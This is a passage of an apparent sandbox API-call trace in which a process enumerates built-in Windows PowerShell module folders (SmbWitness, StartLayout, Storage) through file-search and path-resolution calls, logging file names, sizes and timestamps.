dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 1 [0265.334] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 0 [0265.334] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.334] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.334] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\SmbWitness.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbwitness\\smbwitness.psd1")) returned 0x20 [0265.334] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.334] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0265.334] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", lpFilePart=0x0) returned 0x3f [0265.334] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.335] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.335] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25f8f56a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetStartApps.psm1", cAlternateFileName="")) returned 1 [0265.335] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 1 [0265.335] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 0 [0265.335] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.335] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.335] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0265.335] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", lpFilePart=0x0) returned 0x3f [0265.336] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0265.336] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.336] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25f8f56a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetStartApps.psm1", cAlternateFileName="")) returned 1 [0265.336] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 1 [0265.336] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.337] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0265.337] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.337] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.337] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0265.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.337] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\startlayout"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0265.337] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.337] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout", lpFilePart=0x0) returned 0x3e [0265.337] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\", lpFilePart=0x0) returned 0x3f [0265.337] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.338] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.338] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25f8f56a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetStartApps.psm1", cAlternateFileName="")) returned 1 [0265.338] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 1 [0265.338] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f8f56a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x25f8f56a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x25fb57cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout.psd1", cAlternateFileName="")) returned 0 [0265.338] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.338] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\StartLayout\\StartLayout.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\startlayout\\startlayout.psd1")) returned 0x20 [0265.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.339] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage", lpFilePart=0x0) returned 0x3a [0265.339] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\", lpFilePart=0x0) returned 0x3b [0265.339] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Storage\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.339] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.339] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x63de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Disk.cdxml", cAlternateFileName="")) returned 1 [0265.340] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1672, dwReserved0=0x0, dwReserved1=0x0, cFileName="DiskImage.cdxml", cAlternateFileName="")) returned 1 [0265.340] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd78, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileIntegrity.cdxml", cAlternateFileName="")) returned 1 [0265.340] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x21df, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileServer.cdxml", cAlternateFileName="")) returned 1 [0265.340] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileShare.cdxml", cAlternateFileName="")) returned 1 [0265.340] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ed3, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileStorageTier.cdxml", cAlternateFileName="")) returned 1 [0265.340] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1988, dwReserved0=0x0, dwReserved1=0x0, cFileName="InitiatorId.cdxml", cAlternateFileName="")) returned 1 [0265.341] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d28, dwReserved0=0x0, dwReserved1=0x0, cFileName="InitiatorPort.cdxml", cAlternateFileName="")) returned 1 [0265.341] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5af4, dwReserved0=0x0, dwReserved1=0x0, cFileName="MaskingSet.cdxml", cAlternateFileName="")) returned 1 [0265.341] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="OffloadDataTransferSetting.cdxml", cAlternateFileName="")) returned 1 [0265.341] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Partition.cdxml", cAlternateFileName="")) returned 1 [0265.341] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x523b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhysicalDisk.cdxml", cAlternateFileName="")) returned 1 [0265.341] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="ResiliencySetting.cdxml", cAlternateFileName="")) returned 1 [0265.342] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfb55, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.format.ps1xml", cAlternateFileName="")) returned 1 [0265.342] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1937, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.psd1", cAlternateFileName="")) returned 1 [0265.342] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b0d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage.types.ps1xml", cAlternateFileName="")) returned 1 [0265.342] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2591b, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageCmdlets.cdxml", cAlternateFileName="")) returned 1 [0265.342] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137ebfbb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137ebfbb, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137ebfbb, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageEnclosure.cdxml", cAlternateFileName="")) returned 1 [0265.342] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17b1, dwReserved0=0x0, dwReserved1=0x0, 